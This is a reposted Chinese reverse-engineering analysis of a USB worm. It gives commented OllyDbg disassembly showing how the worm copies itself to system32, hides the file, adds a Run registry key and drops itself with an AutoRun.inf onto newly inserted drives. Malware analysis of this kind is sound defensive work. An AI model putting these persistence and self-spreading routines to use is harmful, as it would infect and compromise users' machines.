- 浏览: 2068553 次
- 性别:
- 来自: 厦门
文章分类
- 全部博客 (1409)
- asp/asp.net学习 (241)
- oracle (10)
- delphi (295)
- java (27)
- pb (1)
- 每日点滴 (49)
- 学习方法 (40)
- 思想方面 (104)
- C语言 (5)
- C++ (1)
- 代码重构经验 (5)
- 软件工程 (3)
- 数据库 (99)
- 英语学习 (3)
- mysql (1)
- 该关注的网站或者网页 (42)
- 总结 (7)
- 要去做的事情 (33)
- 算法 (1)
- 网络方面 (29)
- 随感 (96)
- 操作系统 (36)
- UML (12)
- 常用工具的使用 (55)
- 脚本 (7)
- 汇编 (62)
- 数据结构 (2)
- 财务 (38)
- 语文作文 (16)
- 法律 (1)
- 股票 (88)
最新评论
-
devwang_com:
可以,学习了~~
列出文件夹下所有文件夹的树形结构--Dos命令 tree的使用 -
hvang1988:
不管用啊 frxrprt1.PreviewForm.Pare ...
fastReport预览时嵌入到别的窗体 -
00915132:
我也有这个疑问,非常 感 谢
left join加上where条件的困惑 --SQL优化 -
zhuyoulong:
学习了,高效读书
软件架构师要读的书 -
nTalgar:
非常感谢分享!
Application.ProcessMessages用法:
转自:http://bbs.pediy.com/showthread.php?t=74520
标 题: 【原创】一个U盘病毒汇编源码分析
作 者: newjueqi
时 间: 2008-10-12,20:28
链 接: http://bbs.pediy.com/showthread.php?t=74520
【文章作者】: newjueqi
【作者邮箱】: zengjiansheng1@126.com
【作者QQ号】: 190678908
【编写语言】:VC++6.0
【使用工具】: OD
【操作平台】: XP-SP2
【作者声明】: 刚好U盘中了这个病毒,就拿来研究一下,没有其他目的。失误之处敬请大家赐教!
【题外话】: 分析完这个病毒后的感慨就是这个病毒一点都不像病毒,反而像一个U盘编程的示范代码(虽然金山毒霸每次遇到它都兴奋得叫起来 ^-^),感觉对U盘编程有了一个基础的了解。
另外针对这个病毒本人作了一次PEDIY(在源文件上插入汇编代码, 通过提前截获WM_CREATE消息,使病毒运行时弹出一个对话框告诉用户中毒了)
链接 http://bbs.pediy.com/showthread.php?t=74527
0040288F |> \6A 0A push 0A
00402891 |. 58 pop eax
00402892 |> 50 push eax
00402893 |. FF75 9C push dword ptr [ebp-64]
00402896 |. 56 push esi
00402897 |. 56 push esi ; /pModule
00402898 |. FF15 7C704000 call dword ptr [<&KERNEL32.GetModuleHandl>; \GetModuleHandleA
0040289E |. 50 push eax
0040289F |. E8 5CE7FFFF call 00401000 ;关键,转到RegisterClassA
0040100F |. 50 push eax ; /pWndClass
00401010 |. 897C24 28 mov dword ptr [esp+28], edi ; |
00401014 |. C74424 2C 00114>mov dword ptr [esp+2C], 00401100 ;窗口过程的地址|
0040101C |. 897C24 30 mov dword ptr [esp+30], edi ; |
00401020 |. 897C24 34 mov dword ptr [esp+34], edi ; |
00401024 |. 897424 38 mov dword ptr [esp+38], esi ; |
00401028 |. 897C24 3C mov dword ptr [esp+3C], edi ;
0040102C |. 897C24 40 mov dword ptr [esp+40], edi ; |
00401030 |. 897C24 44 mov dword ptr [esp+44], edi ; |
00401034 |. 897C24 48 mov dword ptr [esp+48], edi ; |
00401038 |. C74424 4C 4C804>mov dword ptr [esp+4C], 0040804C ; |ASCII "UUUUUU"
00401040 |. FF15 18714000 call dword ptr [<&USER32.RegisterClassA>] ; \RegisterClassA
00401137 > \68 748B4000 push 00408B74 ; ASCII "C:\WINDOWS\system32"; Case 1 (WM_CREATE) of switch 00401104 ;第一条分支
0040113C . C605 6D8A4000 3A mov byte ptr [408A6D], 3A
; 3A,也就是ASCII 码 “:”
00401143 . E8 E8000000 call 00401230 ; 调用GetSystemDirectoryA获取系统的目录,内容如下
00401230 /$ 8B4424 04 mov eax, dword ptr [esp+4] ; auto.00408B74
00401234 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401239 |. 50 push eax ; |Buffer
0040123A |. FF15 64704000 call dword ptr [<&KERNEL32.GetS>; \GetSystemDirectoryA
00401240 \. C3 retn
00401148 . 8B4C24 08 mov ecx, dword ptr [esp+8]
0040114C . 83C4 04 add esp, 4
0040114F . 6A 00 push 0 ; /Timerproc = NULL
00401151 . 68 88130000 push 1388 ; |Timeout = 5000. ms
00401156 . 6A 01 push 1 ; |TimerID = 1
00401158 . 51 push ecx ; |hWnd
00401159 . FF15 10714000 call dword ptr [<&USER32.SetTim>; \SetTimer ;申请了一个时间周期为5秒的计时器
0040115F . 68 708A4000 push 00408A70
00401164 . E8 A7000000 call 00401210 ;调用GetModuleFileNameA获取病毒文件自身的路径,内容如下
00401210 /$ 8B4424 04 mov eax, dword ptr [esp+4] ; auto.00408A70
00401214 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401219 |. 50 push eax ; |PathBuffer
0040121A |. 6A 00 push 0 ; |hModule = NULL
0040121C |. FF15 6C7040>call dword ptr [<&KERNEL32.GetModule>; \GetModuleFileNameA ;把病毒的文件路径保存在eax里
00401222 |. F7D8 neg eax
00401224 |. 1BC0 sbb eax, eax
00401226 |. F7D8 neg eax
00401228 \. C3 retn
从以上分析可知道病毒初始化时做了3件事情:
1. 获取系统目录的路径
2. 申请了一个时间周期为5秒的计时器
3. 获取了病毒自身的路径
下面继续分析:
00401171 > \8A15 708A40>mov dl, byte ptr [408A70] ; Case 113 (WM_TIMER) of switch 00401104 ;dl中存储的是病毒的路径
00401104 00401177 . 748B4000 mov al, byte ptr [408B74]
; al中存储的是系统目录的路径
0040117C . 3AD0 cmp dl, al ;比较当前文件的路径是否和系统的路径的相同,也就是检查当前文件是否在系统目录
0040117E . 75 19 jnz short 00401199 ;发现路径不相同就跳00401199
;路径相同就检查有没有设备变化的信息
00401180 . 8B4424 04 mov eax, dword ptr [esp+4]
00401184 . 6A 00 push 0 ; /lParam = 0
00401186 . 6A 00 push 0 ; |wParam = 0
00401188 . 68 19020000 push 219 ; |Message = WM_DEVICECHANGE
0040118D . 50 push eax ; |hWnd
0040118E . FF15 147140>call dword ptr [<&USER32.Send>; \SendMessageA
;发送检查设备的信息
00401194 . 33C0 xor eax, eax ;清空eax
00401196 . C2 1000 retn 10
;发现病毒文件不是从系统目录启动就执行下面的操作
00401199 > 8B4C24 04 mov ecx, dword ptr [esp+4]
0040119D . 51 push ecx
0040119E . E8 AD000000 call 00401250
00401250 /$ 81EC 040100>sub esp, 104
00401256 |. 8D4424 00 lea eax, dword ptr [esp]
0040125A |. 56 push esi
0040125B |. 68 748B4000 push 00408B74 ; /String2 = "C:\WINDOWS\system32"
00401260 |. 50 push eax ; |String1
00401261 |. FF15 147040>call dword ptr [<&KERNEL32.lstrc>; \lstrcpyA
;复制系统路径
00401267 |. 8B35 107040>mov esi, dword ptr [<&KERNEL32.>; kernel32.lstrcatA
0040126D |. 8D4C24 04 lea ecx, dword ptr [esp+4] ;把系统路径传到ecx
00401271 |. 68 98804000 push 00408098 ; /StringToAdd = "\"
00401276 |. 51 push ecx ; |ConcatString,"C:\WINDOWS\system32"
00401277 |. FFD6 call esi ; \lstrcatA
; 调用字符串连接函数使系统路径变为"C:\WINDOWS\system32\"
00401279 |. 8B15 448040>mov edx, dword ptr [408044] ; auto.00408060
0040127F |. 8D4424 04 lea eax, dword ptr [esp+4]
00401283 |. 52 push edx ; /StringToAdd => "uc.exe"
00401284 |. 50 push eax ; |ConcatString,"C:\WINDOWS\system32\"
00401285 |. FFD6 call esi ; \lstrcatA
;路径变为"C:\WINDOWS\system32\ uc.exe "
00401287 |. 8D4C24 04 lea ecx, dword ptr [esp+4]
; ecx中存放路径"C:\WINDOWS\system32\ uc.exe "
0040128B |. 51 push ecx
0040128C |. E8 6F000000 call 00401300
;检查系统目录中是否已存在要复制的文件
00401300 /$ 8B4424 04 mov eax, dword ptr [esp+4]
00401304 |. 50 push eax ; /Path
00401305 |. FF15 007140>call dword ptr [<&SHLWAPI.P>; \PathFileExistsA
0040130B |. 48 dec eax
0040130C |. F7D8 neg eax
0040130E |. 1BC0 sbb eax, eax
00401310 |. 40 inc eax
00401311 \. C3 retn
00401291 |. 83C4 04 add esp, 4
00401294 |. 85C0 test eax, eax ;检查文件是否存在
00401296 |. 5E pop esi
00401297 |. 75 2F jnz short 004012C8 ;如果文件已经存在就跳
00401299 |. 8D5424 00 lea edx, dword ptr [esp]
0040129D |. 50 push eax ; /FailIfExists
0040129E |. 52 push edx ; |NewFileName
0040129F |. 68 708A4000 push 00408A70
004012A4 |. FF15 347040>call dword ptr [<&KERNEL32.CopyF>; \CopyFileA
;把文件复制到系统目录
004012AA |. 8D4424 00 lea eax, dword ptr [esp]
004012AE |. 50 push eax
004012AF |. E8 7C000000 call 00401330
;修改注册表,使病毒文件开机自启动和U盘自动播放
00401330 /$ 83EC 08 sub esp, 8
00401333 |. 56 push esi
00401334 |. 8B35 087040>mov esi, dword ptr >; ADVAPI32.RegOpenKeyA
0040133A |. 8D4424 04 lea eax, dword ptr >
0040133E |. 57 push edi
0040133F |. 50 push eax ; /pHandle
00401340 |. 68 E0804000 push 004080E0 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
00401345 |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
0040134A |. C74424 18 0>mov dword ptr [esp+>; |
00401352 |. FFD6 call esi ; \RegOpenKeyA
00401354 |. 8B5424 08 mov edx, dword ptr >
00401358 |. 8B3D 007040>mov edi, dword ptr >; ADVAPI32.RegSetValueExA
0040135E |. 8D4C24 0C lea ecx, dword ptr >
00401362 |. 6A 04 push 4 ; /BufSize = 4
00401364 |. 51 push ecx ; |Buffer
00401365 |. 6A 04 push 4 ; |ValueType = REG_DWORD
00401367 |. 6A 00 push 0 ; |Reserved = 0
00401369 |. 68 CC804000 push 004080CC ; |ValueName = "NoDriveTypeAutoRun"
0040136E |. 52 push edx ; |hKey
0040136F |. FFD7 call edi ; \RegSetValueExA
00401371 |. 8D4424 08 lea eax, dword ptr >
00401375 |. 50 push eax ; /pHandle
00401376 |. 68 9C804000 push 0040809C ; |Subkey = "SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
0040137B |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401380 |. FFD6 call esi ; \RegOpenKeyA
00401382 |. 85C0 test eax, eax
00401384 |. 75 35 jnz short 004013BB
00401386 |. 8B7424 14 mov esi, dword ptr >
0040138A |. 56 push esi ; /String
0040138B |. FF15 1C7040>call dword ptr [<&KE>; \lstrlenA
00401391 |. 8B0D 448040>mov ecx, dword ptr >; auto.00408060
00401397 |. 8B5424 08 mov edx, dword ptr >
0040139B |. 50 push eax ; /BufSize
0040139C |. 56 push esi ; |Buffer
0040139D |. 6A 01 push 1 ; |ValueType = REG_SZ
0040139F |. 6A 00 push 0 ; |Reserved = 0
004013A1 |. 51 push ecx ; |ValueName => "uc.exe"
004013A2 |. 52 push edx ; |hKey
004013A3 |. FFD7 call edi ; \RegSetValueExA
004013A5 |. 8B4424 08 mov eax, dword ptr >
004013A9 |. 50 push eax ; /hKey
004013AA |. FF15 047040>call dword ptr [<&AD>; \RegCloseKey
004013B0 |. 5F pop edi
004013B1 |. B8 01000000 mov eax, 1
004013B6 |. 5E pop esi
004013B7 |. 83C4 08 add esp, 8
004013BA |. C3 retn
004013BB |> 5F pop edi
004013BC |. 33C0 xor eax, eax
004013BE |. 5E pop esi
004013BF |. 83C4 08 add esp, 8
004013C2 \. C3 retn
004012B4 |. 8D4C24 04 lea ecx, dword ptr [esp+4]
004012B8 |. 51 push ecx
004012B9 |. E8 62000000 call 00401320
;设置病毒文件的属性为系统,隐藏
00401320 /$ 8B4424 04 mov eax, dword ptr >
00401324 |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
00401326 |. 50 push eax ; |FileName
00401327 |. FF15 187040>call dword ptr [<&KE>; \SetFileAttributesA
0040132D \. C3 retn
;如果病毒文件已经在系统目录下,执行下面的操作,这里从00401297跳过来
004012C8 |> E8 D3030000 call 004016A0
;通过枚举进程列表查看自身是否已经运行
004016A0 /$ 81EC 280100>sub esp, 128
004016A6 |. 56 push esi
004016A7 |. 57 push edi
004016A8 |. 6A 00 push 0 ; /ProcessID = 0
004016AA |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004016AC |. E8 BB000000 call <jmp.&KERNEL32.>; \CreateToolhelp32Snapshot
004016B1 |. 8BF0 mov esi, eax
004016B3 |. 8D4424 08 lea eax, dword ptr >
004016B7 |. 50 push eax ; /lppe
004016B8 |. 56 push esi ; |hSnapshot
004016B9 |. C74424 10 2>mov dword ptr [esp+>; |
004016C1 |. E8 A0000000 call <jmp.&KERNEL32.>; \Process32First
004016C6 |. 85C0 test eax, eax
004016C8 |. 74 4E je short 00401718
004016CA |. 8B0D 448040>mov ecx, dword ptr >; auto.00408060
004016D0 |. 8B3D 287040>mov edi, dword ptr >; kernel32.lstrcmpA
004016D6 |. 8D5424 2C lea edx, dword ptr >
004016DA |. 51 push ecx ; /String2 => "uc.exe"
004016DB |. 52 push edx ; |String1
004016DC |. FFD7 call edi ; \lstrcmpA
004016DE |. 85C0 test eax, eax
004016E0 |. 74 21 je short 00401703
004016E2 |> 8D4424 08 /lea eax, dword ptr>
004016E6 |. 50 |push eax ; /lppe
004016E7 |. 56 |push esi ; |hSnapshot
004016E8 |. E8 73000000 |call <jmp.&KERNEL32>; \Process32Next
004016ED |. 85C0 |test eax, eax
004016EF |. 74 27 |je short 00401718
004016F1 |. 8B0D 448040>|mov ecx, dword ptr>; auto.00408060
004016F7 |. 8D5424 2C |lea edx, dword ptr>
004016FB |. 51 |push ecx
004016FC |. 52 |push edx
004016FD |. FFD7 |call edi
004016FF |. 85C0 |test eax, eax
00401701 |.^ 75 DF \jnz short 004016E2
00401703 |> 56 push esi ; /hObject
00401704 |. FF15 207040>call dword ptr [<&KE>; \CloseHandle
0040170A |. 5F pop edi
0040170B |. B8 01000000 mov eax, 1 ;返回值为1
00401710 |. 5E pop esi
00401711 |. 81C4 280100>add esp, 128
00401717 |. C3 retn
00401718 |> 56 push esi ; /hObject
00401719 |. FF15 207040>call dword ptr [<&KE>; \CloseHandle
0040171F |. 5F pop edi
00401720 |. 33C0 xor eax, eax ;返回值为0
00401722 |. 5E pop esi
00401723 |. 81C4 280100>add esp, 128
00401729 \. C3 retn
;判断自身有没有运行
004012CD |. 85C0 test eax, eax ;通过在eax的返回值判断
004012CF |. 75 20 jnz short 004012F1
004012D1 |. 8D5424 00 lea edx, dword ptr [esp]
004012D5 |. 50 push eax ; /ShowState
004012D6 |. 52 push edx ; |CmdLine
004012D7 |. FF15 607040>call dword ptr [<&KERNEL32.WinEx>; \WinExec
;以隐藏的方式执行
004012DD |. 8B8424 0801>mov eax, dword ptr [esp+108]
004012E4 |. 6A 00 push 0 ; /lParam = 0
004012E6 |. 6A 00 push 0 ; |wParam = 0
004012E8 |. 6A 10 push 10 ; |Message = WM_CLOSE
004012EA |. 50 push eax ; |hWnd
004012EB |. FF15 147140>call dword ptr [<&USER32.SendMes>; \SendMessageA
004012F1 |> 33C0 xor eax, eax
004012F3 |. 81C4 040100>add esp, 104
004012F9 \. C3 retn
;有输入设备信息
004011CB > \8B4424 10 mov eax, dword ptr [esp+10] ; Case 219 (WM_DEVICECHANGE) of switch 00401104;
;查了一下MSDN,响应WM_DEVICECHANGE这个消息的函数声明如下
;LRESULT CALLBACK WindowProc(
; HWND hwnd, // handle to window
; UINT uMsg, // WM_DEVICECHANGE
; WPARAM wParam, // device-change event
; LPARAM lParam // event-specific data
;);
004011CF . 8B4C24 0C mov ecx, dword ptr [esp+C]
004011D3 . 8B5424 04 mov edx, dword ptr [esp+4]
004011D7 . 50 push eax ;lParam
004011D8 . 51 push ecx ; wParam
004011D9 . 52 push edx ;hwnd
;因为uMsg是默认为WM_DEVICECHANGE,所以只有三个参数
004011DA . E8 F1FEFFFF call 004010D0
WM_DEVICECHANGE的说明如下:
当Windows系统的硬件设置发生变化时,系统将会向所有应用程序发送一条WM_DEVICECHANGE消息.当有设备被禁止或激活时(比如我们插入光盘,从光驱中取出光盘,或者在系统设备中删除或禁止打印端口),该消息的wParam参数分别被指定为DBT_DEVICEARRIVAL(设备安装完毕)和DBT_DEVICEREMOVECOMPLETE(设备移除完毕),根据这两个参数可以判断闪存是否存在,lParam参数指向一DEV_BROADCAST_HDR结构,该结构中的dbch_devicetype成员是变化设备的类型,当该值为DBT_DEVTYP_VOLUME时,表明一个带有卷标名的驱动器发生了变化
(出处:http://sogoodm.com/soft/t5/16303-63858.html )
004010D0 /$ 817C24 08 008> cmp dword ptr [esp+8], 8000 ;比较是否插入了新的设备,8000是宏DBT_DEVICEARRIVAL的值,表示系统插入了一个新设备,相关的定义在Include\DBT.h头文件里(我的是VC6),顺便说一句,查这个8000表示什么就查了半天,非常郁闷!!!
004010D8 |. 75 20 jnz short 004010FA ;如果不是插入新设备就跳
004010DA |. 8B4424 0C mov eax, dword ptr [esp+C]
004010DE |. 8378 04 02 cmp dword ptr [eax+4], 2 ;
004010E2 |. 75 16 jnz short 004010FA
004010E4 |. 8B40 0C mov eax, dword ptr [eax+C]
004010E7 |. 50 push eax
004010E8 |. E8 03010000 call 004011F0 ;获取U盘的盘符
;枚举26个驱动器,通过查看哪个发生了变化来获取U盘的盘符
004011F0 /$ 8B4C24 04 mov ecx, dword ptr [esp+4]
004011F4 |. 32C0 xor al, al ;从0开始比较
004011F6 |> F6C1 01 /test cl, 1
004011F9 |. 75 08 |jnz short 00401203
004011FB |. D1E9 |shr ecx, 1
004011FD |. FEC0 |inc al
004011FF |. 3C 1A |cmp al, 1A ;比较是否已达到了26
00401201 |.^ 7C F3 \jl short 004011F6
00401203 |> 83C0 41 add eax, 41 ;用盘符的索引加上‘A’得到盘符的字母注意41是16进制,转化为10进制就是ASC码‘A’
00401206 \. C3 retn
004010ED |. 83C4 04 add esp, 4
004010F0 |. A2 5C8A4000 mov byte ptr [408A5C], al
004010F5 |. E8 D6020000 call 004013D0 ;
;把自身复制到U盘并且在U盘下创建一个autorun.inf文件
004013D0 /$ 81EC 08020000 sub esp, 208
004013D6 |. 8D8424 040100>lea eax, dword ptr [esp+104]
004013DD |. 56 push esi
004013DE |. 57 push edi
004013DF |. 8B3D 14704000 mov edi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcpyA
004013E5 |. 68 5C8A4000 push 00408A5C ; /String2 = "B"
004013EA |. 50 push eax ; |String1
004013EB |. FFD7 call edi ; \lstrcpyA
004013ED |. 8B35 10704000 mov esi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcatA
004013F3 |. 8D8C24 0C0100>lea ecx, dword ptr [esp+10C]
004013FA |. 68 90804000 push 00408090 ; /StringToAdd = "\"
004013FF |. 51 push ecx ; |ConcatString
00401400 |. FFD6 call esi ; \lstrcatA
00401402 |. 8B15 40804000 mov edx, dword ptr [408040] ; auto.00408068
00401408 |. 8D8424 0C0100>lea eax, dword ptr [esp+10C]
0040140F |. 52 push edx ; /StringToAdd => "uc1.exe"
00401410 |. 50 push eax ; |ConcatString
00401411 |. FFD6 call esi ; \lstrcatA
00401413 |. 8D4C24 08 lea ecx, dword ptr [esp+8]
00401417 |. 68 5C8A4000 push 00408A5C ; /String2 = "B"
0040141C |. 51 push ecx ; |String1
0040141D |. FFD7 call edi ; \lstrcpyA
0040141F |. 8D5424 08 lea edx, dword ptr [esp+8]
00401423 |. 68 90804000 push 00408090 ; /StringToAdd = "\"
00401428 |. 52 push edx ; |ConcatString
00401429 |. FFD6 call esi ; \lstrcatA
0040142B |. A1 48804000 mov eax, dword ptr [408048]
00401430 |. 8D4C24 08 lea ecx, dword ptr [esp+8]
00401434 |. 50 push eax ; /StringToAdd => "AutoRun.inf"
00401435 |. 51 push ecx ; |ConcatString
00401436 |. FFD6 call esi ; \lstrcatA
00401438 |. 8D5424 08 lea edx, dword ptr [esp+8]
0040143C |. 52 push edx
0040143D |. E8 BEFEFFFF call 00401300 ;检测文件是否存在
00401442 |. 83C4 04 add esp, 4
00401445 |. 85C0 test eax, eax
00401447 |. 5F pop edi
00401448 |. 5E pop esi
00401449 |. 75 17 jnz short 00401462
0040144B |. 8D4424 00 lea eax, dword ptr [esp]
0040144F |. 50 push eax
00401450 |. E8 5B000000 call 004014B0 ;在U盘创建一个autorun.inf文件
00401455 |. 8D4C24 04 lea ecx, dword ptr [esp+4]
00401459 |. 51 push ecx
0040145A |. E8 C1FEFFFF call 00401320 ;设置文件的属性
0040145F |. 83C4 08 add esp, 8
00401462 |> 8D9424 040100>lea edx, dword ptr [esp+104]
00401469 |. 52 push edx
0040146A |. E8 91FEFFFF call 00401300 ;检查文件是否存在
0040146F |. 83C4 04 add esp, 4
00401472 |. 85C0 test eax, eax
00401474 |. 75 2B jnz short 004014A1
00401476 |. 50 push eax ; /FailIfExists
00401477 |. 8D8424 080100>lea eax, dword ptr [esp+108] ; |
0040147E |. 50 push eax ; |NewFileName
0040147F |. 68 608A4000 push 00408A60 ; |ExistingFileName = ""
00401484 |. FF15 34704000 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
0040148A |. 8D8C24 040100>lea ecx, dword ptr [esp+104]
00401491 |. 51 push ecx ;U盘文件的路径
00401492 |. E8 89FEFFFF call 00401320 ;设置文件的属性
00401497 |. 83C4 04 add esp, 4
0040149A |. 81C4 08020000 add esp, 208
004014A0 |. C3 retn
004014A1 |> 33C0 xor eax, eax
004014A3 |. 81C4 08020000 add esp, 208
004014A9 \. C3 retn
最后,进程关闭时的代码如下:
0040111D . 8B4424 04 mov eax, dword ptr [esp+4] ; Case 2 (WM_DESTROY) of switch 00401104
00401121 . 6A 01 push 1 ; /TimerID = 1
00401123 . 50 push eax ; |hWnd
00401124 . FF15 08714000 call dword ptr [<&USER32.KillTimer>] ; \KillTimer
0040112A . 6A 00 push 0 ; /ExitCode = 0
0040112C . FF15 0C714000 call dword ptr [<&USER32.PostQuitMess>; \PostQuitMessage
00401132 . 33C0 xor eax, eax
00401134 . C2 1000 retn 10
1. 病毒描述:
该病毒是一种U盘病毒,病毒运行后释放病毒文件到系统目录下,命名为uc.exe并执行。在用户毫无察觉的情况下;修改注册表键值,病毒开机自动运行,开启自动播放;监测系统中有没有插入U盘,如果检测到插入U盘就向U盘中释放病毒文件并且创建一个autorun.inf文件
2. 病毒行为分析
(1)病毒运行后释放病毒文件:
C:\WINDOWS\system32\uc.exe
(2)修改注册表
在HKEY_CURRENT_USER\ Software\Microsoft\Windows \CurrentVersion\Policies\
Explorer中创建NoDriveTypeAutoRun
在HKEY_LOCAL_MACHINE\ SOFTWARE\MICROSOFT\Windows\ CurrentVersion\
Run中添加病毒文件的路径
(3)向U盘中释放病毒文件和创建autorun.inf文件
发表评论
-
用汇编写的病毒代码
2010-05-29 08:04 1910转自:http://www.programfan.com ... -
堆和栈(堆栈)的区别
2010-05-20 16:47 872转自:http://www.360doc.com/sho ... -
OllyDBG 入门系列(三)-函数参考
2010-05-06 14:07 1401转自:http://bbs.pediy.com/s ... -
OllyDBG 入门系列(二)-字串参考
2010-05-05 19:02 1154转自:http://bbs.pediy.com/s ... -
用汇编编写DOS下的内存驻留程序(5)
2010-05-05 11:05 1033转自:http://www.x86asm.com/Dis ... -
用汇编编写DOS下的内存驻留程序(4)
2010-05-05 11:04 1175转自:http://www.x86asm.com/Displa ... -
用汇编编写DOS下的内存驻留程序(3)
2010-05-05 11:03 901转自:http://www.x86asm. ... -
用汇编编写DOS下的内存驻留程序(2)
2010-05-05 11:02 773转自:http://www.x86asm. ... -
用汇编编写DOS下的内存驻留程序(1)
2010-05-05 11:01 1510转自:http://www.x86 ... -
补码 左移与右移 32位系统
2010-05-02 11:04 2805QQ:797801 计算机中 ... -
c语言控制语句对应的汇编语句代码
2010-04-29 18:15 2262转:http://blog.csdn.net/ ... -
调试windows程序
2010-03-21 10:11 825debug 只能支持1M的寻址 如果需要调 ... -
ds:[bp+2]
2009-11-28 13:22 914mov ax,0 mov ds ... -
程序的起始地址的段地址
2009-11-26 09:38 1336生成EXE之后用Debug加载后,查看寄存器内容如下: ... -
将内存FFFF:0--FFFF:b单元中的数据复制到0:200--0:20b单元中
2009-10-25 21:13 1691该程序的功能: 将内存FFFF:0--FF ... -
标志寄存器
2009-10-25 18:46 1006方便记忆 OF 溢出(是/否) ... -
安全的一段内存空间 0:2000~0:02FF
2009-10-25 18:20 956看到120页了 我们要向内存里写东西 ... -
显示红心的汇编代码
2009-10-25 18:05 934assume cs:code code segment ... -
debug时 遇到loop 指令
2009-10-25 17:35 914debug时 遇到loop 指令 用 p指 ... -
Loop的使用
2009-10-23 21:06 1224看到107页了 王爽汇编第五章 Loop的使用 ...
相关推荐
在IT领域,U盘病毒是常见且危害较大的一类恶意软件,它们主要通过移动存储设备(如U盘)传播,能够感染计算机系统,破坏文件,甚至...无论是对个人用户保护数据安全,还是对开发者提升反病毒技术,都是一个宝贵的资源。
例如,“熊猫烧香病毒汇编源码.asm”就是一个汇编语言编写的病毒样本,通过分析这类源码,我们可以理解病毒的工作机制,包括如何感染系统、如何隐藏自身以及如何传播。 2. **C++与病毒编写**:C++是一种面向对象的...
系统内核、病毒与汇编文章收集总汇 内容包括(绝对无毒): 《天书夜读:从汇编语言到Windows内核编程》.pdfKmd教程1、2-内核模式驱动程序基础.txt PE型病毒编写总结 .txt Ring0代码实现.txt u盘病毒的原理.txt Win...
本文将详细介绍一个简洁高效的U盘病毒监控程序,它专注于检测和防止autorun.inf文件的恶意篡改。 首先,我们要了解 autorun.inf 文件的作用。在Windows系统中,当U盘插入电脑时,系统会自动查找该U盘根目录下的...
易语言查杀U盘病毒源代码是一个专注于使用易语言编程的解决方案,用于检测和清除U盘中的病毒。易语言是中国本土开发的一种高级编程语言,它以其直观、易学的特性,使得初学者也能快速上手编程。这个项目的核心目标是...
C++是一种强大的编程语言,也常被用于创建恶意软件,包括U盘病毒。U盘病毒,顾名思义,是通过USB闪存驱动器传播的一种计算机病毒,它利用用户在不同设备间共享文件的习惯进行扩散。 首先,我们要了解C++感染U盘病毒...
标题 "U盘小偷汇编版(修正)" 暗示了这是一个关于汇编语言编程的工具,可能专门用于复制或备份U盘数据。在IT领域,汇编语言是一种低级编程语言,它直接对应于计算机硬件的指令集。程序员使用汇编语言可以对计算机的...
2. **文件遍历**:为了彻底检查U盘中的所有文件,程序需要遍历U盘上的每一个文件和文件夹,对每个文件进行病毒扫描。 3. **实时监控**:除了扫描外,该工具可能还包括实时监控功能,一旦有新文件写入U盘,即进行...
U盘病毒,全称为USB设备传播的计算机病毒,是一种利用USB设备(如U盘)进行传播的恶意软件。这类病毒通常通过感染用户插入的U盘,进而扩散到计算机系统,对个人数据安全和网络环境构成严重威胁。这篇文档将深入探讨...
标题中的“U盘病毒免疫器”是指一种专门用于保护USB闪存驱动器(通常称为U盘)免受病毒侵袭的软件工具。这类工具的主要功能是预防病毒通过U盘传播,因为U盘作为移动存储设备,经常在不同计算机之间交换数据,容易...
1. **U盘病毒传播机制**:病毒通过拷贝自身到U盘,并创建autorun.inf文件,当U盘在另一台电脑上插入时,会尝试执行病毒程序,从而感染目标计算机。 2. **病毒防范**:定期更新和使用反病毒软件,关闭系统的自动播放...
用户不用掌握任何计算机专业知识,不用掌握任何U盘免疫技巧和办法,只需要点击按钮,就可以轻松打造出一款具有免疫U盘病毒能力的抗病毒U盘。 通过“U盘病毒免疫工具”您不仅可以快速的清除U盘中已经感染的病毒,还...
【U盘exe病毒修复工具】是一种专为解决U盘中被病毒感染,导致文件夹变为.exe可执行程序问题的专用软件。U盘exe病毒通常通过不安全的U盘使用、网络共享或者恶意邮件附件传播,一旦感染,用户U盘中的正常文件夹会被篡...
LPK.DLL病毒是一种常见的计算机恶意软件,主要通过U盘、网络共享等途径传播。该病毒会感染系统文件,尤其是LPK.DLL(Language Pack Kit动态链接库),导致系统运行异常,如键盘输入被劫持、程序无法正常启动等问题。...
在U盘上新建一个Autorun.inf文件,并用记事本打开,输入以下内容: ``` [Autorun] icon=myicon.ico ``` 保存并退出。 3. **设置文件属性** 将Autorun.inf和myicon.ico文件设置为只读和隐藏属性。这样做的...
易语言源码U盘病毒遗漏查杀.rar 易语言源码U盘病毒遗漏查杀.rar 易语言源码U盘病毒遗漏查杀.rar 易语言源码U盘病毒遗漏查杀.rar 易语言源码U盘病毒遗漏查杀.rar 易语言源码U盘病毒遗漏查杀.rar
在数字时代,优盘(U盘...在未来,随着计算机技术的不断进步,我们有望看到更加强大和智能的病毒防护方案出现,但无论如何,持续关注和了解最新的安全威胁与防护措施,对于每一个数字时代的用户而言,都是必不可少的。
标题中的“U盘病毒专杀工具.rar”表明这是一个专门用于消除U盘病毒的软件压缩包。U盘,也称为移动硬盘或闪存驱动器,是常见的便携式存储设备,由于其便携性和易共享性,往往成为病毒传播的一个常见途径。这个压缩包...
在这个“易语言源码U盘病毒扫尾器.rar”压缩包中,包含了一个利用易语言编写的程序,该程序的主要功能是检测并清除U盘中的病毒,以保护用户的计算机系统免受恶意软件的侵害。 首先,我们要理解U盘病毒的传播方式。...
在当今信息化社会中,计算机安全问题日益突出,其中U盘作为一个常见的数据交换工具,也成为了病毒和恶意软件传播的主要途径之一。U盘的便捷性让它成为人们日常工作和生活中不可或缺的存储设备,但同时,它也极易成为...